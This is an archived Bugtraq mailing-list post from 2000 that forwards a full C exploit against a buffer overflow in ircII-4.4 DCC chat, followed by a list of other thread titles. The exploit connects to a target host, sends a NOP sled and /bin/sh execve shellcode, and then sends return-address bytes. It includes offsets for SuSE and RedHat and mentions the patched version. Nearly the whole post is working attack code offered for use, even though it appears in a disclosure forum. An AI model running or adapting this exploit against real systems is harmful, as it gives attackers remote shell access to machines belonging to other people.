Bugtraq mailing list archives
Fwd: ircii-4.4 buffer overflow
From: bladi () EUSKALNET NET (bladi)
Date: Tue, 8 Feb 2000 07:57:28 +0100
/* ircii-4.4 exploit by bladi & aLmUDeNa buffer overflow in ircii dcc chat's allow to excute arbitrary Affected: ircII-4.4 Patch: Upgrade to ircII-4.4M ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz Offset: SuSe 6.x :0xbfffe3ff RedHat :0xbfffe888 Thanks to : #warinhell,#hacker_novatos Special thanks go to: Topo[lb], Saludos para todos los que nos conozcan especialmente para eva ;) (bladi () euskalnet net) */ #include <stdio.h> #include <netdb.h> #include <string.h> #include <signal.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *hozt; struct sockaddr_in tmp; struct in_addr in; if ((hozt=gethostbyname(hostname))==NULL) { printf(" ERROR: IP incorrecta\n"); exit(0); } memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } main(int argc, char *argv[]) { struct sockaddr_in sin; char *hostname; char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char *shell = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int outsocket,tnt,i; printf (" irciismash ver: 1.0\n"); printf (" by \n"); printf (" bladi & aLmUDeNa\n\n"); if (argc<3) { printf("Usage : %s hostname port\n",argv[0]); exit(-1); } hostname=argv[1]; outsocket=socket(AF_INET,SOCK_STREAM,0); sin.sin_family=AF_INET; sin.sin_port=htons(atoi(argv[2])); sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) { printf(" ERROR: El puerto esta cerradito :_(\n"); exit(0); } printf("[1]- Noping\n ["); for(i=0;i<47;i++) { if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); } write(outsocket,nops,strlen(nops)); } printf("]\n"); printf(" Noped\n"); printf("[2]- Injectin shellcode\n"); write(outsocket,shell,strlen(shell)); usleep(999); printf(" Injected\n"); printf("[3]- Waiting\n ["); for(i=0;i<299;i++) { printf("."); fflush(stdout); usleep(99); write(outsocket,"\xff",strlen("\xff")); write(outsocket,"\xbf",strlen("\xff")); write(outsocket,"\xff",strlen("\xe9")); write(outsocket,"\xe3",strlen("\xff")); } printf("]\n[4]- Xploit \n - --(DoNe)-- -\n"); close(outsocket); }
Current thread:
- PGP Signatures security BUG! Povl H. Pedersen (Mar 07)
- Re: PGP Signatures security BUG! Tobias Haustein (Mar 08)
- Re: PGP Signatures security BUG! Werner Koch (Mar 08)
- RealServer exposes internal IP addresses tschweikle () FIDUCIA DE (Mar 08)
- Re: PGP Signatures security BUG! Eric Murray (Mar 08)
- [ Hackerslab bug_paper ] Linux printtool get printer password Sheshep ankh Dubhe (Mar 08)
- Re: [ Hackerslab bug_paper ] Linux printtool get printer password Tuomas Jormola (Mar 09)
- RealPlayer and Comet Cursor Keela Robison (Mar 09)
- Fwd: ircii-4.4 buffer overflow bladi (Feb 07)
- Re: Fwd: ircii-4.4 buffer overflow Derek Callaway (Mar 11)
- Re: RealPlayer and Comet Cursor pedward () WEBCOM COM (Mar 09)
- The Comet Cursor Sarah MacArthur (Mar 09)
- Network File Resource Vulnerability Eric Hacker (Mar 09)
- Re: Network File Resource Vulnerability David LeBlanc (Mar 11)
- misc. cross site scripting issues Marc Slemko (Mar 12)
- a few bugs ... Maurycy Prodeus (Mar 13)
- Re: a few bugs ... Thomas Roessler (Mar 15)
- Re: a few bugs ... Michal Zalewski (Mar 17)
- Patch: ip_masq_ftp / Linux 2.2.x (extended FTP ALG vulnerabilty) Bjarni R. Einarsson (Mar 20)